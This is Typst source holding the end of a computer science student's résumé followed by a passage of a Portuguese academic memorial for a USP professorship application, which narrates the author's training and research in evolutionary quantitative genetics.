#iconText("icons/github.png", "github.com/pm3512", "https://github.com/pm3512", 0.2em, 1.2em)
#iconText("icons/googlescholar.svg", "Google Scholar", "https://scholar.google.com/citations?&user=8ew3do4AAAAJ", 0.2em, 1em)
#if useAddress [
#box([/*TODO update address*/])
]
]
== Education
#chiline()
*Carnegie Mellon University*, School of Computer Science #h(1fr) Expected graduation: December 2024 \
BS in Computer Science with concentration in Machine Learning. \
*GPA*: 3.96, Dean's List: Fall 2021 -- Present. \
*Coursework*: Software Engineering (17-313), Operating Systems (15-410), Computer Systems (15-213), Distributed Systems (15-440), Algorithms & Data Structures (15-210), Program Analysis (17-355), Intro to Machine Learning (PhD, 10-701), Deep Learning (10-417), Generative AI (10-423).
== Experience
#chiline()
*Software Engineering Intern*, Jane Street #h(1fr) May-August 2024
- Optimized an internal routing application to achieve an 80\% speedup.
- Developed a compiler frontend for a domain specific language
#dashedline()
*Software Engineering Intern*, InterSystems #h(1fr) Summer 2022, Summer 2023 \
Summer 2023 \
- Designed and developed a dashboard for a version control application using Angular and SQL.
- Effectively communicated with stakeholders to obtain specifications and feedback.
- Helped identify 3000+ problems in the usage of the application and drive action to fix them.
- After finishing the project early, fixed multiple bugs within the application.
Summer 2022 \
- Implemented automatic end-to-end testing for a product evaluation tool using Cypress.
- Integrated end-to-end testing into the Jenkins CI pipeline.
- Authored documentation and conducted live demos to promote further adoption of the tool.
#dashedline()
*Software Developer & Project Lead*, ScottyLabs #h(1fr) September 2021 -- February 2024 \
- Developed and maintained the registration and judging systems for TartanHacks, Pittsburgh's largest hackathon.
- Leveraged TypeScript, Next.js, React, Prisma and MongoDB to ensure a smooth experience for 350+ participants.
- As a project lead for the registration system, chose the direction of the project and mentored new members.
#dashedline()
*Software Engineering Intern*, CMU CS Academy #h(1fr) January -- May 2023 \
- Developed features and resolved bugs in a web-based platform for teaching computer science.
- Used JavaScript, React and Django to implement features such as media preview, plagiarism detection and exam mode.
- Advocated for and facilitated the adoption of TypeScript in the project.
#dashedline()
*Research Assistant*, CMU Language Technologies Institute #h(1fr) May 2022 -- December 2023 \
- Worked on research in Multimodal and Meta-learning.
- Results published in ICLR 2024.
== Skills
#chiline()
*Languages*: JavaScript/TypeScript, HTML/CSS, Python, SQL, OCaml C, C++, Go, Bash, Java\
*Frameworks*: React, Next.js, Tailwind, Angular, Django, Express, Prisma, Jest, Cypress, PyTorch, TensorFlow, JAX\
*Tools*: Linux, MongoDB, MySQL, Git, Perforce, Jenkins, Vim, LaTeX, Typst\
*Soft Skills*: Teamwork, communication, adaptability, work ethic, attention to detail |
|
https://github.com/diogro/memorial | https://raw.githubusercontent.com/diogro/memorial/master/IB-USP-2024/memorial.typ | typst | #align(left + horizon, text(35pt, font: "Skolar Sans PE TEST", weight: "extrabold")[
*Memorial de Atividades, Títulos e Publicações*
])
#align(left, text(20pt, font: "Skolar Sans PE TEST", weight: "bold")[
*Concurso de Professor Doutor em RDIDP no Departamento de Botânica*
])
#align(left, text(15pt, font: "Skolar Sans PE TEST", weight: "bold")[
#v(15pt)
Instituto de Biociências
#v(0.65pt)
Universidade de São Paulo
#v(15pt)
<NAME>
<EMAIL>
])
#set text(
font: "Skolar PE TEST",
size: 12pt,
lang: "por",
region: "br"
)
#set page(
paper: "a4",
header:[
#set text(9pt, font: "Skolar PE TEST")
Memorial
#h(1fr) <NAME>
],
numbering: "1",
)
#show outline.entry.where(
level: 1
): it => {
v(11pt, weak: true)
strong(it)
}
#pagebreak()
#v(10pt)
#outline(fill: none,
indent: 2em,
title: "Conteúdo",
depth: 2)
#v(100pt)
#align(center, text(13pt)[
*Apresentação*
])
Apresento este memorial atendendo ao Edital 038-2023 publicado pela reitoria da Universidade de São Paulo no Diário Oficial da União de 10 de outubro de 2023, referente ao concurso para o cargo de professor doutor na área de “Biologia de Sistemas – Biologia Integrativa e Preditiva”, em Regime de RDIDP, junto ao Departamento de Botânica do Instituto de Biociências da Universidade de São Paulo.
No que se segue apresento minha trajetória acadêmica, incluindo experiência didática e de pesquisa. Destaco alguns projetos em que trabalhei, e como cada parte da minha trajetória contribuiu para minha formação como pesquisador. Ao final, apresento meu currículo completo e comprovantes para os títulos, cursos, apresentações em congressos, e publicações descritas no texto.
#pagebreak()
#show par: set block(spacing: 1em)
#set par(
leading: 1em,
first-line-indent: 1em,
justify: true
)
#show heading: it => {
block[#it.body]
v(0.3em)
}
= Graduação
== Ciências Moleculares
Minha trajetória não começou na biologia, mas sim no Curso de Ciências Moleculares (CCM), um curso voltado para formar pesquisadores em ciências exatas e biológicas. Foi minha mãe, a Profa. <NAME>, pesquisadora aposentada do Instituto de Ciências Biomédicas (ICB) da USP, quem primeiro me apresentou esse curso. Ela o conhecia pois um aluno do CCM a havia procurado e estava fazendo iniciação científica em seu laboratório. A profissão da minha mãe teve forte influência no meu interesse pela pesquisa científica, sempre gostei de ouvir sobre o dia a dia dela e visitei seu laboratório algumas vezes. Também me sentia atraído pela liberdade que ela tinha para estudar, e via o gosto com que se dedicava ao ensino na universidade. Eu me interessei pelo CCM justamente porque ele me daria a oportunidade de transitar por diversas áreas pelas quais eu me interessava, como biologia, física e matemática, pois eu me interessava pela pesquisa de modo geral, mas ainda não havia decidido por uma área específica. Apesar de ser um curso de bacharelado de quatro anos, o CCM não possui ingresso direto pelo vestibular, e a seleção é feita por uma prova no meio do ano letivo, aberta para alunos de qualquer graduação da USP. Assim, entrei no curso de Ciências Biológicas do Instituto de Biociências (IB) da USP com a intenção de ingressar no CCM assim que possível. Escolhi a biologia, pois era um curso que ficaria feliz de cursar caso não fosse aprovado na prova de seleção do CCM.
Durante o primeiro semestre na biologia descobri que o pai de uma das minhas melhores amigas do ensino médio, com quem eu já tinha uma boa relação, era um dos fundadores e primeiros professores do CCM, o Prof. <NAME> do Instituto de Química. Encontrei o Prof. Hernan em um aniversário da sua filha, e ele me incentivou muito a mudar de curso, pois acreditava que eu tinha o perfil de um aluno do CCM. Apesar desses incentivos e de ter sido aprovado na prova de ingresso, durante meu tempo no IB eu me identifiquei com a biologia e considerei desistir da mudança. Foi um aluno do CCM que conheci na época, e que hoje é um bom amigo, que me convenceu a fazer a matrícula. Assim, após apenas seis meses no curso de biologia, mudei para o curso de ciências moleculares, e hoje vejo que esta foi uma decisão extremamente acertada.
O CCM é um curso especial na sua estrutura. Nos dois primeiros anos, o ciclo básico, os alunos cursam um conjunto exigente de disciplinas obrigatórias que fornece uma base sólida em física, química, matemática, computação e aspectos básicos de biologia, como biologia celular, molecular e bioquímica. Os últimos dois anos do curso, o ciclo avançado, são de total liberdade acadêmica. Cada aluno monta, junto ao seu orientador, uma grade curricular voltada para atender as demandas da área em que ele escolheu se especializar, podendo cursar qualquer disciplina da universidade, sem restrição. A exigência acadêmica do ciclo básico e a liberdade do ciclo avançado fazem com que cada turma do CCM seja única, formada por pessoas com especialidades diversas, habilidades e interesses complementares, e que, ao mesmo tempo, compartilham uma linguagem em comum, estabelecida no ciclo básico. No CCM eu convivi com físicos de partículas a historiadores da ciência, um ambiente que promove a camaradagem e ajuda mútua num processo de aprendizagem desafiador e intenso. Durante o curso, aprendi muito não só com os professores, mas também com meus colegas, e gosto de pensar que também contribuí para o aprendizado do resto da turma. O curso exigiu muito de nós todos e foi um processo de formação crucial para definir a maneira como lido com as pressões do ambiente acadêmico. O ciclo básico do ciências moleculares é tão exigente que fez com que as cobranças do ciclo avançado e da graduação em biologia (quando decidi terminar também este curso) parecessem relativamente brandas. Graças a isso, pude cursar a segunda metade do CCM e o restante do curso de biologia com tranquilidade suficiente para me dedicar também a atividades de pesquisa.
Minha experiência com pesquisa começou durante o ciclo avançado do CCM, no laboratório da Profa. Vera <NAME>, do Departamento de Física Geral do Instituto de Física (IF) da USP. A Profa. Vera lidera um laboratório que integra a teoria de mecânica estatística, uma generalização da termodinâmica, com processos biológicos no nível celular. Meu interesse pelas questões da biologia e os métodos da física me atraíram para essa linha de pesquisa, e comecei um projeto de iniciação científica explorando modelos computacionais para o estudo de transições de fase em membranas biológicas. A ideia do projeto era recuperar em simulações computacionais comportamentos termodinâmicos observados em experimentos com membranas celulares, e com isso entender quais processos são importantes para definir o comportamento das membranas. Para isso, nós utilizamos modelos simples de interações entre os fosfolipídios que compõem as membranas celulares. Este projeto foi meu primeiro contato com uso de simulações em pesquisa, e apresentei resultados preliminares num pequeno congresso em 2007, o _V Brazilian Meeting on Simulational Physics_ em Ouro Preto.
Outra influência importante na minha carreira acadêmica foi o Prof. <NAME>, que era casado com minha mãe. O interesse pelas membranas celulares, que eram o sistema motivador do meu projeto de iniciação científica, e o contato familiar, me levaram a cursar e a atuar como monitor por vários anos na disciplina de fisiologia de membranas que o Prof. Cassola ministrava para o Curso de Medicina da USP. O convívio cotidiano e na universidade com o Prof. Cassola me imbuiu de um profundo respeito pelo debate científico e pelo fazer científico. Suas aulas eram muito ricas e abordavam temas aparentemente díspares, mas sempre ligados por uma narrativa coesa. Participar da sua disciplina foi bastante importante para mim, pois me mostrou como mesmo um tema central da biologia traz consigo uma série de ligações com outras áreas do conhecimento, como a física ou mesmo a filosofia da ciência. Minha atuação em sua disciplina foi o catalisador de um hábito de estar sempre envolvido com monitorias em diversas disciplinas, mesmo que não diretamente relacionadas com a minha pesquisa. Quando entrei na graduação em biologia, em 2003, Cassola me presenteou com o livro _What is life?_#footnote[<NAME>., & <NAME>. (1944). What is life?: With mind and matter and autobiographical sketches. Cambridge University Press (re-editado em 1992).], no qual o físico <NAME>, um dos principais nomes da mecânica quântica do começo do século XX, discute os aspectos fundamentais dos seres vivos e as propriedades que uma molécula responsável pela herança genética deveria possuir. Hoje em dia, acho interessante pensar como a minha própria trajetória ecoou essa temática, partindo da física e voltando à biologia. Talvez o contato com esta obra de Schrödinger tenha me ajudado a enxergar a conexão entre essas áreas do conhecimento e as possibilidades que a interação entre elas pode gerar.
O trabalho no Instituto de Física também me colocou em contato com outro grupo de pesquisa no mesmo departamento, o dos Profs. <NAME>, do IF, e <NAME>, do Instituto de Matemática e Estatística, no qual alguns colegas de graduação faziam as suas iniciações científicas. Este grupo, de mecânica estatística do processamento de informação, era surpreendentemente multidisciplinar e aplicava métodos modernos de física e estatística em problemas vindos da economia, sociologia, biologia e outras áreas da física. Os encontros semanais do grupo eram muito estimulantes intelectualmente e acabaram me influenciando até mais que meu próprio projeto. Mesmo durante o mestrado continuei frequentando essas reuniões. Nelas apresentei prévias de qualificações e palestras, e o grupo sempre me trouxe ideias novas e um ponto de vista externo à biologia, que contribuíram para enriquecer a minha visão teórica e metodológica dos problemas que abordei durante minha formação. Em particular, foi neste grupo que fui apresentado aos métodos Bayesianos, que vieram a se tornar um dos principais focos de estudo e atuação na minha pesquisa. Este contato precoce com a estatística Bayesiana foi um diferencial na minha trajetória acadêmica, já que o tema é raramente apresentado em cursos introdutórios, sendo tradicionalmente abordado somente após um contato com métodos mais tradicionais. Acredito que ter sido apresentado a ela quando eu ainda carregava menos conceitos e preconceitos de outras metodologias contribuiu para o meu domínio destes métodos.
== Ciências Biológicas
Tendo me formado no ciências moleculares e encerrado meu projeto de iniciação com a Profa. Vera Henriques, percebi que, apesar do meu interesse pelos métodos utilizados na física, eu me sentia mais atraído pelos problemas levantados pela biologia. Por isso, decidi retornar à graduação em biologia e aplicar as técnicas que havia aprendido na física a problemas com motivações mais biológicas. De volta ao curso de biologia, conversei com alguns professores do Instituto de Biociências, e optei por me juntar ao grupo do Laboratório de Evolução de Mamíferos (LEM) do Prof. <NAME>. Lembro que quando conversamos pela primeira vez, por intermédio de bons amigos que estudavam em seu laboratório, o Gabriel me disse que o laboratório estava muito cheio e que seria difícil eu entrar naquele momento. Porém, ao descobrir que eu estava vindo da física e que sabia programar, imediatamente falou para marcarmos uma conversa. Foi uma sorte, pois nesse momento começamos uma colaboração frutífera e bem sucedida.
Durante minha iniciação científica no LEM, trabalhei com métodos computacionais para produzir estimativas de matrizes de covariância mais resistentes a problemas de amostragem, que pudessem ser usadas para reconstruir a história evolutiva de fenótipos complexos de forma mais acurada #footnote[Esse pequeno resumo do meu primeiro trabalho ilustra como a minha caminhada para problemas mais biológicos foi, na verdade, bem gradual. Foi difícil convencer minha banca de iniciação científica que esse projeto era, de fato, biologia.
]. Este projeto resultou no primeiro artigo em que participei ativamente na pesquisa, escrita e publicação @Marroig2012-jd. Foi um processo editorial longo até a publicação #footnote[Foi neste trabalho que aprendi a não colocar datas em nomes de arquivos de manuscritos. Tive que mudar duas vezes o ano no nome do arquivo.]. Após uma rejeição acompanhada de boas revisões numa revista prestigiosa, fizemos uma segunda versão bastante modificada e expandida, que foi aceita, incluindo uma parte adicional feita pelo Dr. <NAME>, que era mestrando na época. Foi meu primeiro projeto com o Guilherme, e mais tarde nós trabalharíamos juntos em outros métodos computacionais aplicados à evolução. Em retrospecto, eu sabia bem menos estatística naquela época do que acreditava, e certamente teria escrito outro manuscrito hoje, mas os métodos e conclusões continuam relevantes e robustos.
= Mestrado
Ao concluir a graduação em biologia, eu não tinha dúvidas de que evolução era a área de pesquisa que mais me atraía. A pesquisa em genética de populações e biologia evolutiva depende de modelos matemáticos bem estabelecidos, que me dariam uma oportunidade de usar as técnicas matemáticas e computacionais que eu havia aprendido na física e no curso de ciências moleculares. Além disso, é uma área com diversas perguntas em aberto e que fornece os mecanismos fundamentais para compreender processos biológicos em todos os níveis de organização.
Pensando nisso, ao longo da minha iniciação eu e o Gabriel amadurecemos um projeto de pesquisa para o meu mestrado totalmente baseado em simulações, que fosse relevante para o restante das linhas de pesquisa do LEM. Meu objetivo com esse projeto era trazer para o laboratório algo que em física é algumas vezes chamado de triângulo de Landau#footnote[O nome faz referência ao físico <NAME>, que sempre usa o triângulo em suas apresentações. Ele é conhecido pelo algoritmo de Wang-Landau, um método de Monte Carlo utilizado amplamente em mecânica estatística. É um algoritmo interessante, que usa uma técnica contra-intuitiva de solução de problemas que consiste em, quando confrontado com um problema complicado, buscar uma maneira de complicá-lo ainda mais, que eventualmente leva a uma solução.]: um triângulo equilátero que nos vértices traz as metodologias complementares de #strong[experimento], #strong[teoria] e #strong[simulação]. O triângulo ilustra como esses três elementos podem atuar em sinergia para promover o desenvolvimento científico.
Uma parte fundamental das linhas de pesquisa no Laboratório de Evolução de Mamíferos (LEM) era catalogar os padrões de associação genética entre traços fenotípicos em diversos grupos de mamíferos, e relacionar essa associação com a diversificação morfológica dos grupos. Nesse contexto, existe uma expectativa teórica bem estabelecida de que as associações genéticas devem afetar a resposta evolutiva de curto prazo, e existem dois resultados empíricos relevantes: (1) os padrões de associação genética são relacionados à função desempenhada pelos diferentes traços; (2) os padrões de associação são bastante estáveis em mamíferos, sendo compartilhados por diversos grupos evolutivamente distantes. Pensando no triângulo de Landau, nós nos perguntamos se poderíamos entender, usando um modelo computacional, como essas associações entre diversos caracteres se estabeleciam e como elas eram mantidas. Para isso, eu desenvolvi um modelo baseado em indivíduos que incluía uma arquitetura genética variável, capaz de responder a processos evolutivos. Utilizando esse modelo, mostramos que seleção direcional é um poderoso fator no estabelecimento de associações genéticas, e que seleção estabilizadora era necessária para manter os padrões a longo prazo. Nosso modelo foi o primeiro capaz de simular cenários evolutivos complexos em múltiplos caracteres utilizando uma base genética variável. Este trabalho foi meu primeiro artigo como primeiro autor, e foi publicado em #cite(<Melo2015-bk>, form: "prose").
Durante o mestrado eu me dediquei também a aprofundar meus estudos em estatística Bayesiana, lendo alguns livros texto que hoje norteiam minha prática de pesquisa, em particular os livros _Probability Theory_#footnote[<NAME>. (1996). Probability theory: the logic of science. St. Louis, MO: Washington University.], de <NAME>, e _Bayesian Data Analysis_#footnote[<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2013). Bayesian data analysis. CRC press.], de <NAME> e colaboradores. Esse estudo prolongado ao longo do mestrado, aliado ao contato com o grupo do Prof. Caticha, me forneceram uma base teórica para desenvolver modelos estatísticos customizados para problemas de diversas áreas da biologia, uma habilidade que rendeu colaborações proveitosas durante o doutorado. Listo alguns dos artigos que publiquei como colaborador, nos quais eu fui o principal responsável pela análise de dados, ou pelo desenvolvimento de um modelo adaptado a um problema específico: @Wolf2015-es @Hubbe2016-za @Costa2016-mv @Fukimoto2020-oy.
Foi também no mestrado que começou minha relação com a linguagem de programação R, a qual se tornou minha principal ferramenta de trabalho. No ano de 2011, cursei a disciplina de R oferecida pelos Profs. <NAME> e <NAME> do Departamento de Ecologia do IB-USP, e depois disso passei a utilizar essa linguagem quase que exclusivamente para minhas análises e projetos. Fui monitor da disciplina de R praticamente todos os anos desde então. Usando essa ferramenta poderosa, no final do mestrado eu comecei um processo de sistematização das rotinas de análise usadas no LEM, que descrevo abaixo.
== Entre mestrado e doutorado
Após o mestrado, durante o final de 2012 e todo o ano de 2013, decidi me dedicar totalmente a esse esforço de padronização e implementação em R das rotinas de análise do LEM, visando facilitar a adoção dos métodos do laboratório pelos próximos alunos e pela comunidade científica em geral. Este trabalho foi financiado com uma bolsa de treinamento técnico da FAPESP. Em colaboração com o Guilherme, mencionado anteriormente, e partindo das rotinas que ele havia usado no seu mestrado, reimplementei o _workflow_ do laboratório em R, criando um conjunto de rotinas modulares, eficientes e de fácil disseminação na comunidade científica. O resultado foi o pacote EvolQG#footnote[#link("https://cran.r-project.org/web/packages/evolqg/index.html")], que centraliza boa parte das análises em genética quantitativa aplicada a evolução, e está descrito em #cite(<Melo2015-kf>, form: "prose"). Foi durante esse período que realmente entendi como gerenciar um projeto grande em R e passei pelo processo de criar um conjunto de ferramentas abertas para uso por outros pesquisadores. Hoje o pacote conta com mais de 46.000 _downloads_, sendo amplamente utilizado pela comunidade de genética quantitativa.
Além do trabalho com as rotinas em R, neste período comecei a me envolver com um projeto experimental que o Prof. Gabriel vinha planejando há algum tempo, em colaboração com o Prof. <NAME>, da Universidade de Bath no Reino Unido. A ideia do projeto era explorar a arquitetura genética de fenótipos complexos utilizando um cruzamento experimental entre linhagens de camundongos que haviam sido selecionadas para mudanças em suas curvas de crescimento. O projeto era grande e ambicioso, envolvendo um longo período de criação da nova colônia de animais. O plano era partir de seis linhagens fundadoras homozigotas e criar uma colônia que seria mantida por várias gerações de cruzamentos, mantendo populações efetivas acima de 400 indivíduos a cada geração. Na sexta e última geração, a F6, criaríamos uma população de mais de 1600 indivíduos, divididos em 160 famílias, que seriam extensamente fenotipados para diversos traços, tais como curva de crescimento, composição corporal, morfologia craniana, entre outros. Além disso, todos os animais das gerações F5 e F6 seriam genotipados utilizando um microarranjo desenhado especificamente para essa colônia. Com esse rico banco de dados, estaríamos na fronteira da investigação experimental da evolução dos efeitos genéticos em caracteres complexos e poderíamos relacionar diretamente o processo evolutivo com a arquitetura genética destes caracteres. Este projeto me interessou muito, principalmente porque me daria a oportunidade de avaliar experimentalmente as previsões feitas pelo meu modelo de simulação no mestrado. Era uma oportunidade de estudar como a arquitetura genética interage com um evento de seleção artificial.
= Doutorado
O meu doutorado se inseriu neste projeto maior em colaboração com o Prof. Jason. Eu e o Gabriel ficamos responsáveis pela análise da arquitetura genética dos fenótipos multivariados medidos no experimento, com o objetivo principal de estudar efeitos pleiotrópicos (quando um lócus afeta a variação de mais de um traço simultaneamente). O problema é que, dado o escopo do projeto, eu já sabia que passaria no mínimo 3 anos sem nenhum resultado, e que mesmo após a obtenção dos primeiros resultados ainda seria necessário um longo processo de coleta de dados#footnote[Na prática, a coleta de dados só chegou ao fim em 2020, mais de um ano após o final do meu doutorado.]. Além disso, boa parte do experimento e da coleta de dados aconteceria na Universidade de Bath, onde eu poderia passar no máximo alguns meses de cada vez. Essa distância do dia a dia do projeto e a demora para começarmos a ver resultados foram desafios importantes, que me obrigaram a organizar meu tempo de forma inteligente, para poder atender às demandas do projeto principal e, ao mesmo tempo, desenvolver projetos alternativos que me permitissem concluir o doutorado no prazo de 5 anos. Isso fez com que minha tese tivesse uma estrutura incomum, pois cada capítulo usa um conjunto de dados e métodos diferentes, sendo, porém, conectados por uma mesma temática de estudo da covariação genética.
Logo no início do doutorado, em 2014, visitei o laboratório do Prof. Jason por 3 meses. Foi um período rico, em que participei do início do estabelecimento da colônia de camundongos, trabalhando em colaboração com a pós-doutoranda que seria a principal responsável pela criação dos animais, <NAME>. Durante esse período eu colaborei com o Prof. Jason em um projeto paralelo em que desenvolvemos um modelo Bayesiano para analisar os dados de um experimento feito com a ameba _Dictyostelium discoideum_, um eucarioto unicelular que é uma espécie-modelo de colaboração altruística. Nós exploramos um caso de coexistência entre linhagens de _Dictyostelium_, no qual linhagens "egoístas", que não apresentam comportamento altruísta, conviviam com linhagens "colaboradoras", que apresentam comportamento altruísta. Essa situação apresenta um desafio teórico, já que, segundo a teoria, a linhagem egoísta, ao se aproveitar do altruísmo de uma linhagem colaboradora sem incorrer os custos do comportamento altruísta, deveria excluir a linhagem colaboradora competitivamente. Essa exclusão não acontece, e nós mostramos que a coexistência era possível devido à presença de demandas conflitantes entre diferentes fases do ciclo de vida das amebas. Considerando todos os componentes da aptidão, em todas as fases do ciclo de vida e não só durante a interação entre linhagens, tanto as linhagens egoístas quanto as colaboradoras apresentavam aptidões semelhantes. Um exemplo de aplicação de genética quantitativa a um campo incomum, este trabalho foi publicado em #cite(<Wolf2015-es>, form: "prose"), tendo tido uma recepção positiva, sendo inclusive recomendado pela _Faculty of 1000_#footnote[#link("https://f1000.com/prime/725409260").].
Eu ainda voltaria para a Universidade de Bath uma segunda vez, durante 5 meses em 2016, agora a tempo de participar dos estágios finais da colônia de camundongos. Desta vez participei ativamente da coleta de dados de composição corporal dos animais de F6, além de me tornar o principal responsável por desenhar o microarranjo que depois foi usado para aferir os genótipos de todos os animais das gerações F5 e F6. Foi meu primeiro contato com dados genômicos e ferramentas de bioinformática e novamente um momento de grande aprendizado. Durante essa segunda visita, eu e Jason nos dedicamos ao desenvolvimento de métodos voltados para a análise da arquitetura genética de caracteres complexos, no mesmo estilo dos que seriam necessários quando tivéssemos acesso aos dados do nosso experimento. Para isso, nós utilizamos um banco de dados antigo, do laboratório do Prof. <NAME>, que tinha uma estrutura parecida com os dados que viriam do nosso experimento. Com esses dados, exploramos novas técnicas de mapeamento genético desenhadas para aferir o padrão de efeitos genéticos em vários caracteres simultaneamente e relacioná-los com a história evolutiva da população estudada. Mais uma vez, meu conhecimento de estatística Bayesiana foi fundamental e eu desenhei toda a estratégia de análise, contando com a ajuda preciosa do Prof. Jason. Este trabalho resultou num manuscrito que se tornou um dos capítulos da minha tese, e foi publicado em #cite(<Melo2019-le>, form: "prose").
Além dessas visitas a Bath, enquanto estive no Brasil, distante do experimento com os camundongos, procurei me envolver com projetos em colaboração com os outros membros do LEM. Durante o ano de 2015, comecei um projeto com uma aluna de mestrado do LEM, <NAME>, que hoje é doutora pela Universidade do Texas em San Antonio. Nesse período, Anna estava envolvida em um projeto grande de mestrado e tinha um conjunto de dados coletados durante a iniciação que não haviam sido explorados com cuidado. Eram dados de morfologia craniana de cinco populações experimentais de camundongos derivadas da mesma população ancestral, sendo duas populações selecionadas para aumento de peso, duas selecionadas para diminuição de peso, e uma controle. Trabalhando com a Anna, percebi que esses dados seriam ideais para o estudo da evolução da covariação craniana sob seleção direcional, novamente um modelo experimental que se relacionava com minhas simulações feitas durante o mestrado. Num trabalho a quatro mãos, eu e Anna analisamos estes dados sob a perspectiva da covariação fenotípica, e encontramos um claro padrão de mudança na organização da variação das linhagens selecionadas, compatível com as previsões do meu trabalho de mestrado. Este trabalho também é um dos capítulos da minha tese e foi publicado em, #cite(<Penna2017-if>, form: "prose"), sendo que eu e Anna aparecemos como co-primeiro autores.
Além da colaboração com a Anna, em 2015 eu também tive o privilégio, junto com o Prof. Gabriel, Prof. <NAME> e um ex-aluno de mestrado do LEM, o Dr. <NAME>, atualmente professor na Universidade da Florida, de escrever uma revisão para um dos periódicos da _Annual Reviews_. Gabriel havia sido convidado para escrever um artigo sobre modularidade e convidou nós três para participar. O Prof. Cheverud ficou responsável pela elaboração de uma introdução histórica ao conceito de modularidade, enquanto eu e Arthur lideramos a elaboração da maior parte do manuscrito e da produção de figuras, e Gabriel contribuiu propondo ideias importantes ligadas às consequências macroevolutivas da teoria que revisamos no manuscrito. Eu, Arthur e Gabriel escrevemos a primeira versão do manuscrito em pouco mais de um mês de trabalho intenso, mas muito gratificante. Conseguimos apresentar um resumo didático da aplicação da teoria de modularidade em diversos níveis de organização biológica e, usando ideias do Gabriel, propor um papel maior para a modularidade e covariação genética na diversificação macroevolutiva. Este trabalho foi mais um dos capítulos da minha tese #cite(<Melo2016-yw>, form: "prose").
Finalmente, em 2017, depois de uma série de atrasos devido às dificuldades técnicas de se criar uma colônia de camundongos tão grande, começamos a ter os primeiros resultados do trabalho com o Prof. Jason. Utilizei as ideias que desenvolvemos durante minha segunda visita a Bath para analisar os dados disponíveis naquele momento, e produzi um conjunto de resultados preliminares que relacionava o padrão de efeitos genéticos nos fenótipos de curva de crescimento dos nossos camundongos com a história evolutiva das linhagens fundadoras. Usando um modelo de simulação mais complexo do que o que utilizei no mestrado, consegui também elucidar como o padrão de seleção nas linhagens fundadoras definia os efeitos genéticos que observamos na nossa geração F6. Este trabalho foi apresentado no Congresso Internacional de Evolução em 2018, e se tornou um dos capítulos da minha tese. Esse último capítulo não foi publicado, em parte porque, ao mesmo tempo em que eu o escrevia, em setembro de 2018, nasceu meu primeiro filho, o Tomás, um mês antes do planejado!
Todas essas linhas de pesquisa e bancos de dados diferentes se juntaram numa tese coesa, que explorava de diferentes formas o problema da evolução das associações genéticas e suas consequências evolutivas. A necessidade de me envolver em diversos projetos independentes me obrigou a idealizar um fio condutor único nos trabalhos e, desenvolvendo técnicas adequadas a cada uma das perguntas abordadas nos trabalhos, consegui criar uma linha de pesquisa original e diversa. Enquanto o laboratório do Gabriel sempre trabalhou muito bem com a descrição e compreensão de padrões de covariação genética em mamíferos numa escala macroevolutiva, meu trabalho estendeu essa linha de pesquisa para um lado mais genético, trazendo novas técnicas e colocando a complexidade da arquitetura genética no centro da discussão. Processos evolutivos moldam a arquitetura genética, e a arquitetura genética afeta como as populações respondem a processos evolutivos, num processo de _feedback_ complexo. Explorar essa interação se tornou o cerne da minha pesquisa.
= Pós-doutorado
== Laboratório de Evolução de Mamíferos
Quando estávamos discutindo meu projeto de doutorado, Gabriel acreditava que eu deveria medir fenótipos cranianos com alta resolução nos camundongos da nossa população experimental. Os dados cranianos, aliados aos genótipos, permitem elucidar a arquitetura genética responsável pela variação craniana, e entender como um fenótipo complexo responde aos processos microevolutivos. Esse seria então um banco de dados rico, fornecendo substrato para uma série de projetos que poderiam estender de forma original as linhas de pesquisa do LEM. Entretanto, esse foi um ponto em que discordamos, não porque eu não tivesse interesse nos dados cranianos, mas porque considerava que não teríamos tempo suficiente para completar as medições durante o doutorado. Assim, tomei a decisão de não incluir essa empreitada em nenhum dos projetos submetidos durante esse período, preferindo me concentrar nos fenótipos que poderiam ser coletados concomitantemente ao desenvolvimento da colônia: taxas de crescimento e composição corporal. Fiz isso confiante que esses dados seriam suficientes para o trabalho durante o doutorado e que obter os dados cranianos completos em tão pouco tempo seria muito difícil devido à escala do projeto. Porém, já planejando uma continuidade do projeto, nos dois últimos anos de doutoramento comecei a digitalização os crânios dos animais da F6 no microtomógrafo de alta resolução do Departamento de Genética e Biologia Evolutiva.
Retrospectivamente, adiar o início de um projeto ligado aos dados cranianos foi uma escolha acertada. Escanear os animais foi um processo trabalhoso e cheio de imprevistos. Os animais chegaram ao Brasil no começo de 2017, após um processo demorado para garantir que eles passassem pela alfândega sem percalços. Nessa época, eu coorientava uma aluna de iniciação fantástica, <NAME>, que me ajudou muito no processo de importação dos animais do Reino Unido. Eu e Beatriz passamos semanas processando os cerca de 2400 animais conservados em álcool, catalogando e acondicionando-os em recipientes separados por geração do experimento. Depois disso, foram necessários alguns meses até aprendermos juntos a melhor forma de preparar e escanear os animais, respeitando as limitações de tamanho dos exemplares e tempo de uso do microtomógrafo do departamento. Tudo correu razoavelmente bem até que, em junho de 2017, após cerca de 250 animais escaneados, o microtomógrafo quebrou, e ficou quebrado durante mais de seis meses. Durante esse tempo, Beatriz, eu e Gabriel escrevemos um projeto de iniciação para ela, mas após duas tentativas não conseguimos financiamento FAPESP, por conta de problemas no currículo da aluna no início da graduação, que não refletiam em absoluto a qualidade da pesquisadora que ela com certeza vai se tornar. Depois disso, Beatriz cansou de esperar o microtomógrafo e uma bolsa, e deixou o laboratório, mas não sem antes me ajudar a treinar minha outra aluna de iniciação, a <NAME>, no processo de preparação e escaneamento dos camundongos. No início de 2018, o microtomógrafo finalmente voltou a operar e, aproveitando a universidade vazia nas férias, consegui escanear mais de 1200 animais em 2 meses, praticamente sozinho. Depois dessa empreitada, com a demanda de uso do microtomógrafo aumentando, reduzimos o ritmo de digitalização dos animais, e ao longo de 2018 eu e Amanda terminamos de escanear todos os animais das gerações F5, F6 e alguns dos fundadores, num total de mais de 2200 animais escaneados#footnote[Até onde consegui averiguar, a maior amostra de morfologia craniana já feita em uma única população.]. Todo esse projeto, e principalmente o processo de obter os fenótipos cranianos, me ensinou a planejar no curto e no longo prazo, a escrever projetos resilientes, e a lidar com os imprevistos e atrasos que são comuns a praticamente todos os projetos dessa escala.
